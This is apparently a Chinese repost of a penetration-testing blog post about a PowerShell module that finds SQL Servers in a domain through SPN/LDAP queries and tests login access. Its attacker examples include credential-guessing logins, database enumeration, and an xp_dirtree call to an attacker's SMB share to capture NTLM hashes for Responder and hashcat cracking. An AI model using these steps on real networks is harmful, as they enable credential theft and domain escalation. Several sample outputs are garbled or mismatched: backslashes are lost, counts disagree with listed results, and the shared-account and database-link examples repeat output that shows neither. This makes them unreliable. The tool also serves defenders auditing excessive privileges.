标签:links 存储 comm could 配置 man t-sql word 哈希
当您没有凭据或正在寻找不在域中的SQL Server时,使用各种扫描技术来查找SQL Server可能非常有用。但是,此过程可能很嘈杂,耗时,并且可能由于子网未知,使用非标准端口以及广播域限制而错过服务器。当我在Active Directory中遇到服务主体名称(SPN)时,我知道我已经找到了在域中快速查找SQL Server的快捷方式。
Microsoft的文档指出:“ 服务主体名称(SPN)是客户端用来唯一标识服务实例的名称。”这意味着Windows域系统上安装的每个服务都在Active Directory中注册。其中包括SQL Server服务。因此,任何域用户都可以查询Active Directory服务(ADS),以获取域中安装的SQL Server的完整列表,而无需执行发现扫描。此外,SPN包含正确的实例名称和端口,这省去了您自己进行探测的麻烦。有关SPN的更多信息,我写了一个博客,在此处进行了详细介绍:使用LDAP加快域升级。
知道Active Directory中提供了SPN信息非常棒,但是我很快意识到我需要用于渗透测试的更加自动化的解决方案。
在实验室中玩了一段时间之后,我认为最好有一个脚本,该脚本可以通过LDAP自动从ADS下拉SQL Server列表,并测试当前域用户对它们的访问权限。我再一次使用PowerShell来帮助自动化,因为它本身就支持我需要的一切。例如,标准的PowerShell v.3安装包括对LDAP查询,SQL Server查询,IP解析,ICMP请求以及大量数据结构的支持。不需要其他库,cmdlet或模块。
经过一番修补(并重新修补)后,我将一个名为“ Get-SqlServer-Escalate-CheckAccess.psm1”的PowerShell模块修补在一起。我尝试添加足够的选项,以使其对试图快速识别过多特权的防御者有用,而攻击者试图寻找可用于域升级的软漏洞。它对于简单定位数据存储也很方便。下面,我尝试将一些功能分为防御者和攻击者用例。
我将/ Get-SqlServer-Escalate-CheckAccess编写为PowerShell模块,因此对于那些不熟悉的人,我将首先介绍其安装。
该脚本可以从我的github帐户下载这里。在某些时候,我还将其提交给Posh-SecMod项目。无论如何,请注意,它确实需要PowerShell v3。可以通过将Get-SqlServer-Escalate-CheckAccess.psm1文件下载到以下两个位置之一来手动安装该模块:
%USERPROFILE%\Documents\Windows\PowerShell\Modules\Get-SqlServer-Escalate-CheckAccess.psm1
%WINDIR%\System32\Windows\PowerShellv1.0\Modules\Get-SqlServer-Escalate-CheckAccess.psm1 或者,您可以使用以下命令将其导入:
Import-Module c:\temp\Get-SqlServer-Escalate-CheckAccess.psm1 您可以使用以下命令确认模块已成功导入(或直接运行)。
Get-Command Get-SqlServer-Escalate-CheckAccess数据库管理员通常为所有域用户提供登录SQL Server的特权,因为他们不确定哪些域组实际需要访问。此外,旧版本的SQL Server允许域用户通过默认登录由于特权的继承问题,我覆盖在以前的博客在这里。这些错误配置为域用户提供了获取未经授权访问数据和系统的方法。作为防御者,能够快速识别这些错误配置非常好,这样就可以轻松地将其排入队列并进行修复。
Get-SqlServer-Escalate-CheckAccess脚本的默认输出试图通过显示域上哪些SQL Server允许当前域用户登录来做到这一点。此外,如果用户具有对SQL Server的sysadmin访问权限,并且用于运行SQL Server服务的帐户是Domain Admin,则输出将显示SQL Server实例名称。以下是一些我认为对辩护人有用的例子。
PS C:\Get-SqlServer-Escalate-CheckAccess
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com [*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed
[+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes
[*] ----------------------------------------------------------------------
[*] 3 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00
[*] Total Time: 00:02:00
[*] ----------------------------------------------------------------------
PS C:\Get-SqlServer-Escalate-CheckAccess -ShowSum | export-csv c:\temp\sql-server-excessive-privs.csv
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com
[*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed
[+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes
[*] ----------------------------------------------------------------------
[*] 3 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00 [*] Total Time: 00:02:00
[*] ----------------------------------------------------------------------
下面是输出的示例屏幕截图: 
上面的示例显示了我实验室的结果,但是在实际环境中,我通常会看到数百台服务器。出于娱乐目的,我还建议将此脚本作为域计算机帐户运行。可以通过使用“ psexec.exe –s –i cmd.exe”获得LocalSystem shell并运行脚本来完成。我想您会惊讶于有多少SQL Server域计算机帐户可以访问。我知道我曾经 无论如何,以攻击示例为例...
针对SQL Server的攻击非常常见。下面,我提供了一些示例,展示了如何在此脚本的帮助下执行其中的五个示例。
PS C:\Get-SqlServer-Escalate-CheckAccess -sqluser test -sqlpass test
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com
[*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as test...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication failed
[+] Failed - server3.mydomain.com,1433 (192.168.1.103) is up, but authentication failed
[+] Failed - server3.mydomain.comSQLEXPRESS (192.168.1.103) is up, but authentication failed
[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: No - SvcIsDA: Yes
[*] ----------------------------------------------------------------------
[*] 1 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00
[*] Total Time: 00:02:00
[*] ----------------------------------------------------------------------
PS C:\Get-SqlServer-Escalate-CheckAccess -query "select name as ‘Databases‘ from master..sysdatabases where HAS_DBACCESS(name) = 1"
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com
[*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as test...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication failed
[+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103)-Sysadmin:No - SvcIsDA:No
[+] Query sent: select name as ‘Databases‘ from master..sysdatabases where HAS_DBACCESS(name) = 1
[+] Query output:
Databases
---------
master
tempdb
msdb
[+] SUCCESS! - server3.mydomain.comSQLEXPRESS(192.168.1.103)-Sysadmin:No-SvcIsDA:No
[+] Query sent: select name as ‘Databases‘ from master..sysdatabases where HAS_DBACCESS(name) = 1
[+] Query output:
Databases
---------
master
tempdb
msdb
[+] SUCCESS! - server4.mydomain.comAppData(192.168.1.104)-Sysadmin: Yes-SvcIsDA: Yes
[+] Query sent: select name as ‘Databases‘ from master..sysdatabases where HAS_DBACCESS(name) = 1
[+] Query output:
Databases
---------
master
tempdb
msdb
PCIDataDB
ApplicationDB
CompanySecrects
[*] ----------------------------------------------------------------------
[*] 3 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00
[*] Total Time: 00:02:00
[*] ----------------------------------------------------------------------
PS C:\Get-SqlServer-Escalate-CheckAccess -query "exec master..xp_dirtree ‘\\192.168.1.50\file‘"
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com
[*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[-] Failed - server2.mydomain.com (192.168.1.102) is up, but authentication/query failed
[+] SUCCESS! - server3.mydomain.com,1433 (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] Custom query sent: exec master..xp_dirtree ‘\\192.168.1.50\\file‘
[+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] Custom query sent: exec master..xp_dirtree ‘\\192.168.1.50\\file‘ [+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes
[+] Custom query sent: exec master..xp_dirtree ‘\\192.168.1.50\\file‘
[*] ----------------------------------------------------------------------
[*] 3 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00
[*] Total Time: 00:02:00
[*] ----------------------------------------------------------------------
有一个称为Responder的出色工具,可用于捕获从每个SQL Server发送的密码哈希。可以从github 此处下载。最后,可以使用OCLHashcat之类的工具破解哈希。
PS C:\Get-SqlServer-Escalate-CheckAccess -ShowSum | export-csv c:\temp\sql-server-excessive-privs.csv
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com
[*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[+] SUCCESS! - server2.mydomain.comAppOneDev (192.168.1.102) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server3.mydomain.comAppOneProd (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes
[*] ----------------------------------------------------------------------
[*] 3 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00
[*] Total Time: 00:02:00
[*] ----------------------------------------------------------------------
在此示例中,您可以看到其中三台服务器正在使用共享域服务帐户。 
PS C:\Get-SqlServer-Escalate-CheckAccess -ShowSum | export-csv c:\temp\sql-server-excessive-privs.csv
[*] ----------------------------------------------------------------------
[*] Start Time: 04/01/2014 10:00:00
[*] Domain: mydomain.com
[*] DC: dc1.mydomain.com
[*] Getting list of SQL Server instances from DC as mydomainmyuser...
[*] 5 SQL Server instances found in LDAP.
[*] Attempting to login into 5 SQL Server instances as mydomainmyuser...
[*] ----------------------------------------------------------------------
[-] Failed - server1.mydomain.com is not responding to pings
[+] SUCCESS! - server2.mydomain.comAppOneDev (192.168.1.102) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server3.mydomain.comAppOneProd (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server3.mydomain.comSQLEXPRESS (192.168.1.103) - Sysadmin: No - SvcIsDA: No
[+] SUCCESS! - server4.mydomain.comAppData (192.168.1.104) - Sysadmin: Yes - SvcIsDA: Yes
[*] ----------------------------------------------------------------------
[*] 3 of 5 SQL Server instances could be accessed.
[*] End Time: 04/01/2014 10:02:00
[*] Total Time: 00:02:00
[*] ---------------------------------------------------------------------- 如您在示例中看到的,两台服务器具有可能被利用的数据库链接。 
标签:links 存储 comm could 配置 man t-sql word 哈希
原文地址:https://www.cnblogs.com/kuaile1314/p/12654774.html
